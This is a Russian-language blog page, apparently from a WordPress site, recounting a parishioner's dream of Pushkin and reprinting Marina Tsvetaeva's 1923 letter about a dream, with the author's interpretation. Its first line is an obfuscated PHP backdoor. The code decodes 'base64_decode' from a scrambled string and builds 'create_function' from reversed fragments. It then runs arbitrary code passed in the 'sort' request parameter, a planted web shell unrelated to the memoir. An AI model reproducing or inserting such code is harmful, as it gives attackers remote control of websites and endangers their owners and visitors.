nnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnn?php /** * @package dazzling */ ?>

ПРИМЕЧАНИЯ (два сна )


            элиграф

". . . . . . .А   ДУНЯ  РАЗЛИВАЕТ   ЧАЙ.
ЕЙ   ШЕПЧУТ ; " ДУНЯ , ПРИМЕЧАЙ ! "   ( "  Евгений  Онегин " )

                                   1)    СОН  С  ПУШКИНЫМ   ДУХОВНОЙ  ЧАДЫ  о. ГЕОРГИЯ

                 Галина  из  Опочки,  которая  рассказала  мне  свой  сон  ещё  в  начале  девяностых –  наша  попечительница  и   духовное  чадо  о.Георгия  с  самого  начала  нашего житья  в  Теребенях. Надо  сказать,  что  в Теребенскую  церковь  она ездила  ещё  в   бытность  здесь  архимандрита  Елевферия (Попова), а  когда   владыка  Владимир ( Котляров )  перевёл  его во  Псков,  она  была  счастлива,  что  свято  место  пустым  не  осталось,  и  Господь  привлёк  сюда  нас. Милость  Божия всегда  над  Теребенями простиралась  –  вот  и  Галина  Николаевна  Шакова  была  не  просто  прихожанкой – приезжанкой, но  просто   в  те  советские  и  постсоветские  годы   была  нашей  спасительницей – окормительницей,  а  именно: официанткой в  опочецком   ресторане. Это  для  понимания   её   с н а   немаловажный  факт.
    Итак, её  сон  без  каких-либо  предисловий.
    Предстал  перед  ней  Пушкин  собственной  персоной. Она  сомлела,  но  сразу  вострепетала: " Александр  Сергеевич ! " Вы, вы . . . такой  великий,  знаменитый . . . ( и др. всяко  разные  возвеличивающие  эпитеты )   и  вдруг   явились    мне  .. .такой  ( шли  самоуничижительные  эпитеты ) ! . ."
         А   великий   поэт,  как  и  в  случае  с  Раневской,  осадил  её  на   самом  взлёте    её   боготворения   и  сурово  сказал: " Голодный  я  !  ВОТ  моё   п и т а н и е ! " –  и  он, протянув  к  ней руку,  на  кончике  пальца  показал  малюсенький  кусочек   то  ли  хлеба, то  ли  булки,  с  чем   и  исчез  вместе  со  сном .
   Сновидица  сразу  же  рассказала  это  видение  другим  духовным  чадам  о.Елевферия,  которые  аккурат  были  экскурсоводами  в  Пушкинском  заповеднике  и,  приезжая духовно окормляться  в  Теребени,  в  прямом  же  смысле – окормлялись   и   у  неё  –  в  уголке  ресторана. Впечатлившись  этим  сном,  они  рассказали  его  коллегам.  А  известное дело:  если  покойник   во  сне  жалуется  на  недоедание  –  на  самом  деле  ему  просто  молитв  не  хватает.
    По   этому  поводу  была  организована  вошедшая  в память сотрудников заповедника  панихида.  Только  я  не  спросила  ( или  спросила.  да  забыла ),  в  какой  именно  церкви  они  молились:  ведь  это  было   д о  возвращения  Святогорского  монастыря  епархии..

                                      2)    и  ещё   К   ТЕМЕ   С Н О В     –    СОН  МАРИНЫ  ЦВЕТАЕВОЙ

      Сон  Цветаевой   мне  попался  в  журнале " ВЕСТНИК русского  христианского  движения " № 165  за 1992 г.  Я  этот  журнал  искала, чтобы  найти  напечатанное  там  письмо  о.Георгия  к  представителю  журнала  в  Москве  А.Н.Богословскому.
       Я  на  днях  нашла  журнал  и,  продиктовав  сыну  его  исходные  данные,  чтобы  он  поместил  папино  письмо  на  сайт www.mitsov.ru,  который  он  сделал,  я  журнал  стала  просматривать.  И  вот  там -то,  под  редакцией   Н. Струве  и Лубянниковой,  представлены  " Десять  писем  Марины  Цветаевой  Богенгардтам ".
           Я,  конечно,  очень  заинтересовалась даже  не  столько  сном  Цветаевой,  сколько  её  искренней  п р о с ь б о й    его   п р о т о л к о в а т ь.  Ведь  точно  так  же  я  " клюнула "  на  просьбу  " немцев  с  колокольни " (  как   мы  их  стали  называть ),  которые  оставили  в  Великую  Отеческую войну  свои  адреса  на  стене  с  призывом  " пожалуйста,  с о о б щ и т е   после  войны " ,  что  я  и сделала.  И  какие интересные  события   это  повлекло   за  собой !
    Так  вот.  Ради  любви  к  интригам  и  для  " общего  развития"  я  перепечатываю  сюда  письмо  Марины  Цветаевой, предваряя   его  своим  уточнением,  что  21  сентября, когда  оно  написано – это  церковный  д в у н а д е с я т ы й   праздник Рождества  Богородицы.  А  " Чтение  Двенадцати  Евангелий "  происходит  вечером  в    Ч и с т ы й   Ч е т в е р г,  перед  Пасхальным  воскресением.
    Цветаева  интересуется  названием  иконы. Как  таковой,  с  таким названием  иконы  нет, но,  конечно,  важен  сам  факт  наличия  перед  ней  в  стене " окна  в  другой  мир ".
                   
                                          ИТАК,

МАРИНА   ЦВЕТАЕВА     Б О Г Е Н Г А Р Д Т А М

ПРАГА,  21  СЕНТЯБРЯ  1923 г.

      А   ВОТ  СТРАННЫЙ  СОН,  КОТОРЫЙ  МНЕ  НЫНЧЕ   ПРИСНИЛСЯ,  ГОСПОДА,  ПОДУМАЙТЕ  И  НАПИШИТЕ,   К Т О     К А К    ТОЛКУЕТ :

        ИДУ   С  НЕСКОЛЬКИМИ  ЛЮДЬМИ  ПО  УЛИЦЕ, ВДОЛЬ  БЕЛОЙ  СТЕНЫ.  НАВСТРЕЧУ  —  НЕ  ТО  КРИВЛЯКА,  НЕ  ТО УБОГИЙ:  ВОЛОСЫ ,  КАК  ПАКЛЯ ,  ГРИМАСНО ЛИЦО ,  УЖИМКИ.  ПРОТЯГИВАЕТ  ОГРОМНУЮ  КРАСНУЮ ( зачёркнуто )   РОЗУ  И  НАЗЫВАЕТ  КАКУЮ – ТО  ВЕСЬМА  СКРОМНУЮ  ЦЕНУ (ЛИРУ).  БЕРУ  ЕЁ   —  И —   МНГНОВЕННО  РОЗА ИСТЛЕВАЕТ ,  СКРЮЧИВАЕТСЯ ,  ЖЕЛТЕЕТ  И  ТОЖЕ  ГРИМАСНИЧАЕТ ,  КАК  ТО  ЛИЦО.
И   Я ,  ПОЧЕМУ – ТО   ПО – ИТАЛЬЯНСКИ: " MA  QUESTO  NON  E  PIU  UNA  ROSA  " ( но  это  уже  не  роза )  И   ЕЩЁ  ЧТО -ТО.
      НО  ЕГО  УЖЕ  НЕТ,  НЕ  ВЗЯВ  ЛИРЫ ,  ИСЧЕЗ.  ЦВЕТОК У  МЕНЯ В  РУКЕ,  И  Я  В  УЖАСЕ :   К У Д А    С  НИМ ?  ( БРОСИТЬ   ПОЧЕМУ – ТО   НЕ  РЕШАЮСЬ. )  И   ВИЖУ :НАД  СТЕНОЙ  —  РАСПЯТИЕ,  ГОЛГОФА  ХРИСТОС    И  РАЗБОЙНИКИ.  ХОЧУ-БЫЛО  ХРИСТУ ,  НО  . . .  ВЕДЬ   ЭТО  ЖЕ  НЕ  РОЗА !  ЭТО  ЯВНАЯ  МЕРЗОСТЬ .  ТОГДА  —  РАЗБОЙНИКУ .  НО  РАЗБОЙНИК  ХРИСТОМ  ПРОЩЁН !  ТОГДА ,  ОТЧАЯВШИСЬ ,  КЛАДУ ЕЁ К  ПОДНОЖЬЮ КРЕСТА ,  ВЕРНЕЙ  —  У  САМОЙ  СТЕНЫ ,  —  И  ГОЛОС :
    "   Б У Д Е Т      Б Е Д А    Н А    Д В Е Н А Д Ц А Т Ь    Е В А Н Г Е Л И Й  " .
 СМОТРЮ :  В СТЕНУ  ВДЕЛАНА  ИКОНА ,  ДОЛЖНО  БЫТЬ,  ИКОНА  12-ти  ЕВАНГЕЛИЙ .  (  ЕСТЬ  ЛИ  ТАКАЯ ? )  И   ПРОСЫПАЮСЬ.

ГОСПОДА ,  НЕПРЕМЕННО   ПОДУМАЙТЕ ,  МНЕ   Т А К И Е    СНЫ   РЕДКО   СНЯТСЯ , НЕПРИЯТНОЕ   ЧУВСТВО .

=================================================================================================
     Не  хотела  я  лезть  со  своими  толкованиями  и  догадками  –  я   уже  сто  раз  сказала,  что  не  люблю  поэзию,  ещё меньше  поэтов  (  хотя  в  школе  просто  обожала  Лермонтова  . . . ), но  не  могу  удержаться   от   одного  наблюдения, почитав  в   Интернете  кошмарную  биографию  Цветаевой.
    Если  ей  во  сне   названо  некое  событие  на  " Чтение  12  Евангелий ",  то  впереди  у  Марины  Ивановны  всего семнадцать  Великих постов  с  Чистыми  четвергами.
   Набожной  она,  конечно,  не  была.  НО.
   Если  предположить,  что  речь  идёт  о  ближайшем  Чистом  четверге  с  вечерним  чтением   12  Евангелий,  дата  которого 24  апреля  1924  года, то  по  доступным  в  Интернете  сведениям,  это  –  преддверие   з а ч а т и я    е ю    и   Эфроном   их   сына,  Георгия, Мура  с  печальной  судьбой.
    Долгожданный  для  Цветаевой  и  нежеланный  для   Эфрона   с ы н   родился  1 февраля  1925 года.
    Как  и  сами  роды, так  и  то,  что  врачи  напутали,  высчитывая  дату рождения  младенца  –  сказано  в  книге  Виктории Швейцер  " Быт  и бытие Марины  Цветаевой ".
    Правда,  там  сказано,  что  предполагали  более  поздний  срок  рождения . . . Но,  там  же  в  книге  сказаны  эти  подробности:  малыш  родился  просто  великаном,  меньше  всего  –  недоношенным !
    Но  ведь   факт  –   что    в р а ч и    " н а п у т а л и "  !                      
    Мы  же  знаем,  какие  потёмки  эти  даты !

 POST SCRIPTUM  1
                  " ( Антиохийская  школа  толкования  пророчеств) Интенциональный  смысл  пророчества  может  и  не  совпадать  с  его  реальным  смыслом,  который  вполне  раскрывается  и  делается  понятным  лишь  п о с л е   того,  как  это  пророчество   и с п о л н и т с я   (  а  не  в  тот  момент,  когда  оно  было  только  возвещено),  и  поэтому  полагали,  что    д е й с т в и т е л ь н ы м,  или   и с т и н н ы м,  может  быть  только    р е т р о с п е к т и в н о е   истолкование  пророчеств – но известных   о т д е л ё н н о м у   от  пророка  толкователя  значительной  исторической  дистанцией."
                                                                                ( Нестерова  О.Е.   ALLEGORIA  pro  TIPOLOGIA )

POST SCRIPTUM  2
                       Я  думаю,  редактор  религиозной  направленности журнала " РХД "  решил  поместить  в  нём  избранные  письма  М.Цветаевой   т о л ь к о   ради  приведённого  здесь   письма.

                    +
               петр  иоанн  андрей
филипп  фома  варфоломей
               два иакова  матфей
  иуда яковль,т.е. ф а д д е й
    зилота симон   и  матфИй


Добавить комментарий